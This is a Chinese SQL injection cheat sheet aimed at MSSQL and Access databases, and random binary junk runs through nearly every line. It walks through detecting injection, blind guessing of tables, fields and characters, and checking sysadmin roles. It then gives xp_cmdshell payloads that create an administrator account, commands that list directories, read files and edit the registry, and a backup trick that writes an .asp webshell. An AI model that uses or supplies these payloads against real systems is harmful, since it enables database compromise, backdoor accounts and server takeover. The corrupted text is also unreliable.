1.判断是否有注入;and 1=1 ;and 1=2 |Th{*IJ�<,
2.初步判断是否是mssql ;and user>0 53QP~[F8R]
`*a�,8M%��
3.注入参数是字符'and [查询条件] and ''=' i]v!o$���7
.uP$�M(?�j
4.搜索时没过滤参数的'and [查询条件] and '%25'='
o&zV8DE_v
j������X%Q
5.判断数据库系统 z$NLFJvy_-
tj3p7�1�%
;and (select count(*) from sysobjects)>0 mssql B�G"6��jQh
EA\~m*k��
;and (select count(*) from msysobjects)>0 access +�j,�;g�#d
[�g?� N�U]
z,tax`��O
���_�!C��H
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �RjT[y: �!
jv ";?*I6.
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 `��xS�XGI
�`W9_LROD�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 `�6/7},"9t
�S�v �,_G'
9.(1)猜字段的ascii值(access) �*sTQ9 K�r
�]:;��gk&P
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 b�pzA '
g>
gS�%J�`X$�
(2)猜字段的ascii值(mssql) }73H$ss:��
-3�f���vO~
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��P1kd6]�s
se���q$]��
10.测试权限结构(mssql) :MVD8�3?4
a'Z"�Yz^Eo
OQq7|dZ�u�
�F�2&KTK��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- eXY�R/j<�8
�L`�\ILJz�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 6T-(GHzfHJ
iAN#TCwLT7
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ~4M]S��X1z
&e(de$}xt�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- i<
ih :���
_�
|; �b�h
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �i[<O�@�Rb
6Z$T&��Ul{
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- W��+S�>/`N
�`{���/tx!
;and 1=(select IS_MEMBER('db_owner'));-- y&
�)�z�\8
e\����89;)
Q�_�dFZ���
+#W5�Qb}VR
11.添加mssql和系统的帐户 mU�jA9[@ �
�Xf0pQ]8\�
;exec master.dbo.sp_addlogin username;-- �p"T4;QBxQ
;exec master.dbo.sp_password null,username,password;-- 6V)��#��Yf
�l$FHL2?Cp
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- it.�l;L_nW
�`27? f$,
;exec master.dbo.xp_cmdshell 'net user username password Kl*�##qw�!
Y/ `�f�PgE
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �G/y< �bPQ
GXAc�y��OV
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Uz0�mS�fBp
G
-;Yua2\�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ]?kf;A���@
��'��:Te#S
�Cc�^t&�Eg
�'�j�.�{o�
12.(1)遍历目录 Rk'Dd4"m�,
P=h2�Z,2�
;create table dirs(paths varchar(100), id int) = *sP��,
6
a7+�B�Ama<
;insert dirs exec master.dbo.xp_dirtree 'c:\' �<Z�� v�G&
=q._Qsj?fu
;and (select top 1 paths from dirs)>0 xzy9~)��)o
kxKB�I{�L
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) '�K�0Y��@y
4U((dx*�m
?��.�T=�(-
?D.]��c;PR
(2)遍历目录 n_aKciF���
(Yx rZ_F'b
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- vs.��q<i-u
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �O�vF�Z&S[
O6`@'N>6P�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 *P_TG"�^{W
<_����NF
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 <��'/+E�4m
f[.]�JC+�,
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��UZ<!(g.�
_uR�gK�oiy
W�4Eo�1 �E
'Ct�+0X�:D
13.mssql中的存储过程 6�rR�PqO
j
j���tZ@`io
xp_regenumvalues 注册表根键, 子键 �4��0Du*5M
?-��(E$l�l
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 T-�27E��$0
}g3)z%Xe'[
xp_regread 根键,子键,键值名 �;1BbRnC�r
��2qN�6{+]
;exec xp_regread U'�@_f���g
�d=x�we�U<
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �m86w{b$8
p<$z��!|7m
xp_regwrite 根键,子键, 值名, 值类型, 值 8�(BLS{-"<
Q<��"zpwHR
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 f$P pFSY4
g6N{Z e Wg
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 w7��O��(I"
iX4/;2B=,
xp_regdeletevalue 根键,子键,值名 9�m�<>G3Jr
-t��DmzuD6
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ~_R=2t{u�_
�
|�,.gl�L
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 VDscZt)�y8
T�9u/|O��P
�B=�9|g�1e
�|�vzGFfRI
14.mssql的backup创建webshell iLFF "Hs
��5^�tL�#�
use model 27;*6�/>,�
&!~q#w1W-5
create table cmd(str image); e`Yx]�3;u(
��)u<s�EF�
insert into cmd(str) values (''); /\2��s%b*�
3C�.�bzw�^
backup database model to disk='c:\l.asp'; P�_�w+p"@m
w2P�k�w'a{
-[� �F<�u�
N>VA`+�aFR
15.mssql内置函数 Q~uj:�A]n<
G:f]z;�Xdp
;and (select @@version)>0 获得Windows的版本号 o-/Xa[�yC�
��9!PJLI=D
;and user_name()='dbo' 判断当前系统的连接用户是不是sa l��^&#fz��
3 b�GpK9M~
;and (select user_name())>0 爆当前系统的连接用户 2c}�>}�A�4
MA"�DP7e?v
;and (select db_name())>0 得到当前连接的数据库 _t���3n��<
�I,��.>tC�
w$�{�=]h*2
Cvq2UNz(R
16.简洁的webshell "M�2�HiV�
�8j�8FQ!M�
use model 3<?#*z4]_�
I� lvjS^j�
create table cmd(str image); <�0pB�u7a�
O7:J�G[tR*
insert into cmd(str) values (''); �G�tb�I�w�
entO"~*�EX
backup database model to disk='g:\wwwtest\l.asp';
